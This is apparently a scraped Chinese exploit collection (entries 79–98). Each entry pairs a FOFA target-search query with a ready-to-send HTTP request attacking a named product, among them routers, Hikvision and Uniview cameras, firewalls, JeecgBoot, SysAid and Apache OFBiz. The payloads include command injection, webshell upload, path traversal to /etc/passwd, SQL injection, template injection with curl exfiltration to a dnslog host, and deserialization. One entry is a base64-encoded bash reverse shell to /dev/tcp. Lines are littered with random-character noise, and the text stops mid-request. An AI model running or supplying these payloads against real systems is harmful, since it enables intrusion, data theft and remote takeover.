GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1: _; _7 C& E5 h
Host: x.x.x.x
8 n* ~8 Q& |! {3 J& Y
; C! \: J5 Z; q: V5 s! D- Y( Z
7 u& V. V$ |2 ~2 U o79. BYTEVALUE 百为流控路由器远程命令执行
" o: w6 }' X3 e; IFOFA:BYTEVALUE 智能流控路由器6 @8 F- Y" T- C9 m% B
GET /goform/webRead/open/?path=|id HTTP/1.1
/ s# N- l! o: ~( v" h; F5 O5 j) SHost:IP1 T; H% @* v: | p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% h6 r" \- M2 f' I! H- L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 O) e6 m. I4 O: Q6 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 W1 |. |" b1 k% ~Accept-Encoding: gzip, deflate* P! c) d7 X8 ~$ T6 q+ l
Connection: close4 P/ _' ]6 e' @9 m# m0 ]) z, f
Upgrade-Insecure-Requests: 1
% t) b4 ?3 B* \7 Q7 ^3 k
& ?) T, I! q$ j$ I9 R& X8 O7 d8 Y: J2 L2 M
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
! Q$ k8 o7 B; Q5 Y1 s8 f, H; p6 Y* LFOFA:app="速达软件-公司产品"
( J$ K: g: z" f2 S. X8 e( DPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.16 a5 R7 j( f1 J! I5 x
Host: x.x.x.x1 [& f! \/ e ^" m3 k7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 z/ q- ?3 X i8 `# A8 l3 FContent-Length: 27
6 r1 {- k8 c6 Z, [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
y& f& X/ @6 O- ~0 ^- AAccept-Encoding: gzip, deflate: ]0 `3 J) g. h* T% @0 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- H, ^& i! f) w# fConnection: close: Q ^/ u+ v+ Y7 Q
Content-Type: application/octet-stream" K4 G* l1 d4 @9 Y W
Upgrade-Insecure-Requests: 1& b! X, e6 U5 H5 a7 x. A9 H
* X: s/ D0 }) I3 R2 x5 o<% out.print("oessqeonylzaf");%>
: ]$ {( c3 M7 @9 J. R) z/ K0 m+ @! ^' K
1 G: l3 L5 f+ z7 v' K9 zGET /xykqmfxpoas.jsp HTTP/1.1: g9 n) M! [, P7 p
Host: x.x.x.x0 F/ t8 V# S7 [+ H' ^5 D; V3 e( M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ k8 u- l: |) D8 [; O' x
Connection: close- @" [ r4 z. _& c8 i& M
Accept-Encoding: gzip* z4 s8 L" c& y
6 Z7 |& p7 B/ w% E& Q0 i3 r
0 y" j8 b( G6 S- R5 k* A81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- C8 C$ R2 U0 j2 H0 U2 q X5 L0 a& ?( CFOFA:app="uniview-视频监控"1 Z) E' w6 o& |# B! G( A5 o* h
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ Y+ s0 ~, g! ~
Host: x.x.x.x
' P! f7 y$ _" v; J+ YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: U! _9 K" X- d% z
Connection: close+ H/ A; s- [1 y, r
Accept-Encoding: gzip/ G" G* D. f( Z ^& w! U
% M4 V- @3 W3 z; |. n- F- X- |7 F. g9 i$ A3 R" F9 b
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行8 T. b3 ?( L( e0 l4 g2 n* G; l7 m
FOFA:app="思福迪-LOGBASE"" ]# a) A. ~5 [& t& |$ o
POST /bhost/test_qrcode_b HTTP/1.1
; ^$ F$ |1 ?& w& wHost: BaseURL( J0 m9 N: ], t8 s1 `8 Y
User-Agent: Go-http-client/1.1! S5 H2 F0 B: G, i; G1 b
Content-Length: 23
6 F% j8 T6 \1 J3 b; [+ E( e" aAccept-Encoding: gzip3 p. i1 F0 {5 }- G& W8 [
Connection: close k$ B3 l8 H0 V) D5 Z( K. H
Content-Type: application/x-www-form-urlencoded
5 `* p# f9 p, aReferer: BaseURL& R$ m1 t+ B {& p# P* }& O
$ w" {; p/ O' V) Uz1=1&z2="|id;"&z3=bhost
! r; y2 a" _9 X* @
- \- ?8 h' Z e7 u9 i1 g
1 P' H2 A z& K y% T83. JeecgBoot testConnection 远程命令执行
: W' n( a# V+ Y# L9 y# @ KFOFA:title=="JeecgBoot 企业级低代码平台"
$ j( h* o3 c/ y4 D) K# t5 }+ D& u* N- L/ I) B9 c, |: Z
8 A$ J/ o! p; N z" f8 `$ nPOST /jmreport/testConnection HTTP/1.1
( x4 l9 K: a9 _4 U3 x1 zHost: x.x.x.x
. E0 A8 l- O" |" p8 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ w! F- @8 M6 ~$ T. D1 S3 DConnection: close
E v+ ]( l9 q8 P* X; ?Content-Length: 8881
) m& ?9 \0 E I/ I- q% o$ E% V) aAccept-Encoding: gzip. ]+ P" e9 i! i$ P3 G% o3 u1 |
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"$ t2 z$ J9 M/ `% K% s
Content-Type: application/json: g+ M$ y) T q% A
) @9 n3 W- S0 W) f3 @7 G
PAYLOAD
; }4 V K9 r4 G" |3 H
0 G4 l/ S3 I9 L+ ?) i84. Jeecg-Boot JimuReport queryFieldBySql 模板注入; T @7 {5 i$ d5 R$ }. n$ p
FOFA:title=="JeecgBoot 企业级低代码平台"
6 M' N9 B `! p* ]0 _
+ r4 K( V* B Y( r1 T. N: B8 d' g2 T/ \+ k3 k$ q z. A
m6 \% N$ k+ S8 mPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1" v! |0 D! T F$ ~
Host: 192.168.40.130:8080
5 o( H4 e4 h) IUser-Agent: curl/7.88.1
; e; Y# I6 f6 `Content-Length: 1565 G6 e+ r+ Y+ _- W
Accept: */*8 y* X* f8 L; ~6 L( ?* R
Connection: close
5 o% ~2 F7 H4 M7 C+ DContent-Type: application/json6 j, g3 {4 w* @7 N. `% c. ~8 j4 d
Accept-Encoding: gzip
7 ^6 V: e3 }: h0 b* ^( D, F6 S" n
{ B9 |/ k1 S! g2 a
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}", b- m4 y. b: K2 m2 e0 i
"type": "0"/ e' ~4 x h% @# |
}
' Q% H. z' g% S3 Q5 W5 n$ Q0 [1 |6 n8 P3 g
- g, r0 {5 u7 T
85. SysAid On-premise< 23.3.36远程代码执行0 A8 g1 b6 f6 Y( v- ~6 k
CVE-2023-47246( w( Y; @! D( R h
FOFA:body="sysaid-logo-dark-green.png"
: n7 V1 C# K5 M% q. WEXP数据包如下,注入哥斯拉马# S! q5 ^! @( G
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
/ L5 Q9 `* `# ~Host: x.x.x.x
/ d l6 r. r' _0 |6 S3 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* x- c: @7 x0 e. h/ j% \/ EContent-Type: application/octet-stream4 c: F' t- S' A5 Z, Q; ^# N: }
Accept-Encoding: gzip
8 o- M4 j& b& F! F6 X
2 P2 _2 K# i. H6 R. WPAYLOAD
& r: ]6 T0 j: l+ d. F8 {
- l$ [& o4 j" C0 y7 _) c回显URL:http://x.x.x.x/userfiles/index.jsp, M! `+ S* ^* ]) r; O; B; o! b
$ [2 a" M2 o' C1 j
86. 日本tosei自助洗衣机RCE
1 t" E/ ~' D, Y! y7 `) gFOFA:body="tosei_login_check.php"/ K4 ?6 A% O8 n7 [: \
POST /cgi-bin/network_test.php HTTP/1.1
- \# v8 v4 k# t4 H9 ?Host: x.x.x.x" F1 ^* c* V% X7 _% B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) ~( ]+ F& q7 p
Connection: close
9 K) ~' i! U* w( R/ v6 nContent-Length: 44* E8 y2 U& ?' J6 X/ d
Accept: */* x0 d7 b, P1 i6 ]; e# i i
Accept-Encoding: gzip
' ]6 |4 p, H) d$ L' y CAccept-Language: en5 L* G) _0 \9 }
Content-Type: application/x-www-form-urlencoded: M k8 U2 x; ?) Z" O
8 p+ A% W' G% s, d
host=%0acat${IFS}/etc/passwd%0a&command=ping0 {6 g- ]* Y: z# }& K
0 b; A/ V. d8 O# D& g
# U2 f" g# O! L2 L1 K6 f, m) n$ a
87. 安恒明御安全网关aaa_local_web_preview文件上传3 m7 q7 ~9 I; ~) b9 |* Z
FOFA:title="明御安全网关"+ [, f$ ^% J, Q% _3 m
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
: J# g! l0 I7 A8 Z2 X: v2 N9 l6 S5 tHost: X.X.X.X
; p4 c9 u" Q1 P' i: zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# X4 m# h8 y1 o4 m UConnection: close
* B; }/ `) \. p! ^. sContent-Length: 198
8 c3 u' p8 |: B$ q5 u' EAccept-Encoding: gzip
2 ^0 @) x b9 o9 o" bContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd5 l, j; p& Y7 Q" W9 d8 o+ a9 o
' J( K# K9 H7 @--qqobiandqgawlxodfiisporjwravxtvd0 |8 N8 J$ d( M; h- \5 F' c
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"' e, U& {7 z# ~
Content-Type: text/plain+ b; J/ x8 Z8 I3 p
) }+ k$ a3 g! e5 B2 X& b
2ZqGNnsjzzU2GBBPyd8AIA7QlDq- q8 L6 E3 M" q2 y" o
--qqobiandqgawlxodfiisporjwravxtvd--
5 Q" q. Q" p$ j: p- D! [$ Z4 \) J% n
m1 Z' F5 y) z8 j% ~
/jfhatuwe.php' e; _7 k: o; l: Z$ N5 _. d8 r& r
) a. Q, B6 U2 [, B88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. C! Z, b7 r6 a. `FOFA:title="明御安全网关"
$ I6 E& e! b n1 d' b7 J& m$ M gGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.16 J7 q) w0 {; p% a% o1 m/ \9 Z
Host: x.x.x.xx.x.x.x
. @/ m1 l6 V3 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 C1 O) ?' x( p( c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 B6 ^ }9 ?; Q
Accept-Encoding: gzip, deflate+ P6 [ Z! H3 ^1 H$ {1 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 h& \# y( _. y: D: J2 S
Connection: close
5 D. k6 Y& d J
1 b9 E( B" u, }- ~4 @8 s4 u9 f! U$ @8 n" d# V3 G
/astdfkhl.php
2 {6 x" M6 Q! r% w/ N
q# ?) K! w' ~* R% E: S89. 致远互联FE协作办公平台editflow_manager存在sql注入
4 V4 j$ W9 X1 B* z5 P9 TFOFA:title="FE协作办公平台" || body="li_plugins_download" d, G0 C! ]+ ]& I; G0 a3 n
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
2 p$ i8 @7 O* l8 V! _) VHost: x.x.x.x6 n& C' w( f$ i# {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( T& V4 U! f+ k G9 M5 t
Connection: close9 g1 T% {3 L9 Y! w% c, `
Content-Length: 414 L5 K5 D$ d9 X7 m9 G% }3 |9 `& f
Content-Type: application/x-www-form-urlencoded
( u0 l) t$ I6 v$ X: lAccept-Encoding: gzip+ N( b: o0 K; @2 o9 R0 q1 V6 y
) A# d. y( ]1 t( [6 m% _ d5 j# T) B7 q% T
option=2&GUID=-1'+union+select+111*222--+
5 v+ ^. t8 k% A3 j' G% `$ I& C9 M& X# B7 M- {6 S8 J' t J3 o
, y5 V3 j2 m! ^2 M- S' g ]90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% v9 y! R+ M9 l7 m' D
FOFA:icon_hash="-1830859634"
# U$ e' g7 U( T8 |- }6 h6 qPOST /php/ping.php HTTP/1.1
2 L7 D7 Z, H m. z1 ~/ ` THost: x.x.x.x1 K2 a# u/ @/ Z$ A$ n+ a! Q: v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
( @3 k5 c( r+ kContent-Length: 51
8 G2 u+ j' O0 p' e: UAccept: application/json, text/javascript, */*; q=0.01% _1 ?! O5 b" o4 d+ |6 X$ {
Accept-Encoding: gzip, deflate
( {6 S- R* ]: S) }$ C, h f' g! BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 ^) a9 Z; @! A; m( K! @1 \
Connection: close
3 z9 @- f% w' Y' U! F5 R( a" cContent-Type: application/x-www-form-urlencoded* H2 Y/ m: S0 l$ k& K" z
X-Requested-With: XMLHttpRequest
7 q! z9 k& Y/ B) S4 n$ s0 F6 K# B4 Z! I/ W# k( i0 q' F
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig" Z1 Q7 H% k3 \, i/ L# x8 Q4 W$ ]
: _( e% M& q8 H0 Y& `, W* s7 D& I2 b1 u* B* @
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# [: t3 k) J$ h- l0 H) I% A* L
FOFA:title="综合安防管理平台"
3 R0 H o8 t; P7 A, IGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
* z* c, L8 t( G; c$ H; AHost: your-ip
- x# n* e9 f6 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& F& d' ~2 M* E/ C. j0 M oAccept-Encoding: gzip, deflate
; U" _- p1 e* X' }3 sAccept: */*$ P# r! u2 ^7 g$ t
Connection: keep-alive
, [( Q( M5 |+ @) g6 k( ~& z
: h. i! `2 J. K9 x9 o* f. q" R0 W" y( C4 r! o: M+ D
+ T& A* q6 y3 _! f
92. 海康威视运行管理中心session命令执行/ S0 O/ M( M6 Q
Fastjson命令执行6 v; F' U, G/ L( g
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"- e9 V) [& m. ?; X6 o0 X( I
POST /center/api/session HTTP/1.1
' ~3 N4 n# t, l I3 j! L% w$ gHost:
/ Y9 L$ u! T0 ~. g. ^$ jAccept: application/json, text/plain, */*
, V1 T1 ~9 u# T! l5 N5 }Accept-Encoding: gzip, deflate
2 `% f5 g# B, ^# j `X-Requested-With: XMLHttpRequest$ F6 K _2 s. X
Content-Type: application/json;charset=UTF-81 O/ V6 K9 J9 |5 m) S- `3 ]
X-Language-Type: zh_CN6 I \3 p7 f4 Y1 l" {
Testcmd: echo test
. n0 N1 e+ Q+ L! B5 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 r* h5 ?' e5 K0 EAccept-Language: zh-CN,zh;q=0.9
1 r0 Q+ a! U& s9 ~8 B( CContent-Length: 5778
! j, C6 G. p9 ?! o2 \9 t* T( t1 ~" E& E* G# d. r
PAYLOAD
) R: N9 d, |- B6 \( k" a }+ N# @
" N. q& ?& I9 L5 ?1 ~, Y2 s93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
- V5 z/ c6 [- [* g* h; H. @" ]FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="* x- f4 E* ?$ W n+ ]+ l
POST /?g=app_av_import_save HTTP/1.1# u) p" B% E9 a/ K' o# i; w) B- J
Host: x.x.x.x
3 ] B+ Y$ N5 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
/ l* v! b" Q. x$ Y1 f/ kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; X% p+ f5 U7 j* ~4 _, B3 g9 U# o% M5 _
------WebKitFormBoundarykcbkgdfx
5 M1 S5 f+ U, l4 \5 aContent-Disposition: form-data; name="MAX_FILE_SIZE"
2 l3 \% ~: n5 e g7 ~4 O
4 J, B: ~( M1 d8 x10000000" C3 ]! Y4 f5 Z" C n7 l0 C* \
------WebKitFormBoundarykcbkgdfx& J4 e* v/ }7 @, d7 |4 k6 ?
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"2 V/ x9 E# s8 b" C; Q
Content-Type: text/plain
V. ]5 }7 t6 ~1 o2 y. v1 q& G1 F
( t3 F; s2 X% J. m" F) O8 Ewagletqrkwrddkthtulxsqrphulnknxa
, D7 g" _" q T6 z. D3 r------WebKitFormBoundarykcbkgdfx
# f8 R1 q5 z" Q% s jContent-Disposition: form-data; name="submit_post"
' P' j0 y2 G5 a) u$ L% Y9 M$ S+ z1 K9 ^7 B- B: T0 j7 B
obj_app_upfile( U; p! m; z( [) b8 [" g
------WebKitFormBoundarykcbkgdfx5 c6 E: m- D$ l( m: x- \9 J
Content-Disposition: form-data; name="__hash__"$ n1 U3 |+ C* X5 `3 f0 C
( `7 ?4 \% {. S H4 l: Q0b9d6b1ab7479ab69d9f71b05e0e9445$ z9 {* s& F" q: h: y
------WebKitFormBoundarykcbkgdfx--4 \+ o! D3 Q" _' D+ [1 z- O
R9 Z0 c# b! d+ c' P. k4 }9 A
& }$ Q$ F, C7 a. b, ?8 k6 \! ^, ]
GET /attachements/xlskxknxa.txt HTTP/1.1" ~: g1 z D3 V- _0 o
Host: xx.xx.xx.xx' l$ ~ H9 k z( g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 |8 k1 A! k4 w7 [
$ U' S- [0 }) m6 ?8 \# ]! U6 r) ^) z! q/ Y7 V
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
3 `5 c; q. G) Z; {1 K9 ^3 F( j5 t5 eFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
3 i# f. }! K$ i, Y$ U- uPOST /?g=obj_area_import_save HTTP/1.11 Q- E, Y1 Z0 k8 M: X8 k
Host: x.x.x.x; s. t( u$ C8 l7 E! e. E1 W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
* c& b4 O0 ?- \; G' Y" {4 F- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; u! O, F3 k' ^2 _' P `
" U4 h! L; x6 J1 p3 }------WebKitFormBoundarybqvzqvmt3 A( a8 [& t9 A F
Content-Disposition: form-data; name="MAX_FILE_SIZE"" N" H6 `% C1 I- |* G) c
8 J2 S9 Y! s/ h1 D k8 h10000000 U7 y+ m- T$ H) `
------WebKitFormBoundarybqvzqvmt5 f X$ c: F& j6 w# w$ C1 @# C1 S- D
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
: Q; s) s* \7 _) K: HContent-Type: text/plain
0 e9 e# `0 t& A" |: N; f* G& V% K. t/ ]9 Z9 ?
pxplitttsrjnyoafavcajwkvhxindhmu& L% _- c6 v; l. l9 f& [. O+ {( H: r
------WebKitFormBoundarybqvzqvmt
) x; E& a3 @; Y/ f- HContent-Disposition: form-data; name="submit_post"
8 p, n; Q! B3 Y/ s5 ?4 D8 u: N- w H: j: Q. T2 i
obj_app_upfile C/ L3 D. x( m9 a# k6 U1 U' ]
------WebKitFormBoundarybqvzqvmt+ K! A. R4 q- O1 }' C- \( w$ C
Content-Disposition: form-data; name="__hash__"6 d7 |- m* n3 @9 d5 v
# M( B& p# t* F; e; E1 ~, w3 z1 ]
0b9d6b1ab7479ab69d9f71b05e0e9445
/ z+ a1 Z7 C. f/ q! a7 b4 i6 v------WebKitFormBoundarybqvzqvmt--
4 k( R5 Q _$ r! T( A* ?3 g" ~
8 Y ]0 R2 Q. x' n" V
1 b+ F6 H& r# v) _( h1 c, D0 K7 I# c5 R7 K/ S5 |
GET /attachements/xlskxknxa.txt HTTP/1.1 Y( s$ R ?4 X9 n' d6 {& v
Host: xx.xx.xx.xx
5 w8 B: e+ ]6 x' u$ uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 u0 l+ |3 z6 `$ a
. G- l; {+ Q0 w8 J- c Q( ]
$ c+ D5 c6 ^5 X s, ~
" Z& U6 y$ k% a& C+ A/ S
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
- z- S3 L, I* n- D; |5 F- ~CVE-2023-49070! k4 |4 y( o# o& G6 W/ q
FOFA:app="Apache_OFBiz"; d" \8 h# Z) h
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 W+ E- s1 x& z
Host: x.x.x.x
5 F% _' _: q W5 mUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& V, d/ [( r- U. c9 ]3 P+ Q( O
Connection: close& i, W; H1 J2 O3 F( M& x& ?
Content-Length: 889" J3 `5 K% D( e# L
Content-Type: application/xml+ A% i+ R7 o$ \( }" ^) Z3 N
Accept-Encoding: gzip- H, {1 J+ t4 t( [! X8 _
g; k. N5 T$ g- @+ R; O$ o
<?xml version="1.0"?>
; Q6 p, C }% I7 g<methodCall># t3 `4 c7 l; C- O
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>* Q& s+ r& n+ ]# {
<params>7 P0 m$ D1 {# i2 L
<param> ~! r d0 Q: {* w) h% V/ T
<value>2 Y/ I1 Q% u C& X
<struct>
! I5 ?( H# u3 k1 P <member>
2 z- W1 s5 K* { <name>test</name>
8 _4 m6 S6 z- r- v. R' b7 v* I <value>
# s' K+ H4 a1 N n" T2 N) w6 S) C2 K <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
8 V4 D1 k% O; w/ v$ V </value>2 h" c! M" F) n+ u
</member>, \$ E/ x7 j1 e9 l7 t
</struct>
$ [" d% X& ]* T4 V4 n) m </value>
% x) H% x ~) |( K ], [0 N6 X </param>* E) |2 v5 @& J
</params>$ `# L1 Y& V$ E! O; m: S9 H
</methodCall>& E6 a* i- |% K# w6 E
5 s; l# ] z) }1 N. ?& d/ V6 M D8 D% z/ R" x" C
用ysoserial生成payload; S' u+ {3 h2 z2 o, a1 }5 s4 `
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"1 X0 f) K$ g# l. f- [& x3 p W
Z, ^5 k. L- l) `. O- ^
2 w+ |3 }" J( D1 I8 g" I9 Q: t( R将生成的payload替换到上面的POC/ E6 t* B& l4 k' m( B- O8 }& |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
) l! K* M/ i; u3 t5 I: nHost: 192.168.40.130:8443" a. P+ E! g7 t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36+ h0 v; W3 n/ G$ O1 `
Connection: close
+ Q4 ?2 W& t8 ^5 NContent-Length: 889
$ O8 U& j0 C( `& h. E6 j5 [Content-Type: application/xml1 N& q6 O: c! a: T
Accept-Encoding: gzip1 w; y, ?) q! x7 {, e
, d# r7 x+ Z1 l& N8 M% L1 K- m
PAYLOAD' D" d/ E8 X! z/ q, s
; z& c0 @# S% c9 X3 i/ u5 Z96. Apache OFBiz 18.12.11 groovy 远程代码执行
) z: x$ i+ ^$ p) S" yFOFA:app="Apache_OFBiz"
' F* Q1 n0 ]/ h9 `6 i* o) I8 {POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- a/ n8 U7 o1 A V4 q7 `9 z/ Q# a
Host: localhost:8443: O& R7 V* u( f$ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 P/ F9 _" U. DAccept: */*( ? R e) R; i# X" ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. {, I: R6 d9 o4 {% i9 P$ W3 V
Content-Type: application/x-www-form-urlencoded6 u" J+ G. i; O
Content-Length: 55
: Y0 m) \6 K/ P. Q- v5 K/ M; W! J; \* t' a% |9 ~! ~8 |
groovyProgram=throw+new+Exception('id'.execute().text);: m$ J8 `# [4 x3 o! k
[- d$ E, u, Z
* b9 K4 s; p1 Y1 w' a
反弹shell7 x! K1 v6 f' H# F( x3 I
在kali上启动一个监听! n* R8 u# k* o+ z* R: v9 f
nc -lvp 77778 `6 G- X- p8 Z
! [ ~4 B R5 [) PPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1) n1 K4 X" @3 {& _# d
Host: 192.168.40.130:84435 {2 v5 i. p: p2 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% p6 V# W& H" ~- T( @
Accept: */*: v1 S$ C" _* a& ?) H" X' I q, X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 W( P3 F9 L+ Y. e1 T
Content-Type: application/x-www-form-urlencoded5 d. F% Y+ v( J0 e ~, d
Content-Length: 711 T' D4 W1 c4 @. M- L6 k9 G
7 M$ p& G8 ]( g- L: [4 \% g
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();( ], b7 d7 | d" }' e; \- b) ^# H
L. _6 _' @( l- p6 g. p
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
) ^2 w! U* r$ M3 [: XFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; n7 C6 b1 C8 V7 n) c; [
GET /passport/login/ HTTP/1.1
' V/ t, _$ b4 W7 z4 sHost: 192.168.40.130:8085! n+ h" ~" G3 C% K. c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) E8 ~# N: z9 e, k j
Accept-Encoding: gzip+ u6 d, d5 S3 e6 [( \3 a- \ }
Connection: close
4 B9 P# v% M6 k6 c% eCookie: rememberMe=PAYLOAD
+ p9 {: g% }: r" T8 MX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
& o# o' ?1 p7 G4 s+ ^0 E4 [3 n' K0 K
! V* A6 Z4 p% m7 `6 e" G" ?' y* d3 b; E
98. SpiderFlow爬虫平台远程命令执行4 [0 a5 @/ v, v$ Z+ s: y( Q: a
CVE-2024-0195
. Y1 ^. d; R7 nFOFA:app="SpiderFlow"
/ ^5 z4 j- ?* P: tPOST /function/save HTTP/1.1! C; S7 s+ U! H. R! Y% e- ^2 O
Host: 192.168.40.130:8088
7 ^7 X- N6 o. T, ] WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' C9 H7 b& J( I( ?0 _7 [Connection: close- A' Q% l% S3 _ e3 X$ U' J" R; z" `
Content-Length: 121$ c& w0 ]7 i; E
Accept: */*, a& |3 ~& b- C6 r! I
Accept-Encoding: gzip, deflate
& s3 |" V( z! H' n9 }# I AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! B! R8 R [2 \) IContent-Type: application/x-www-form-urlencoded; charset=UTF-8
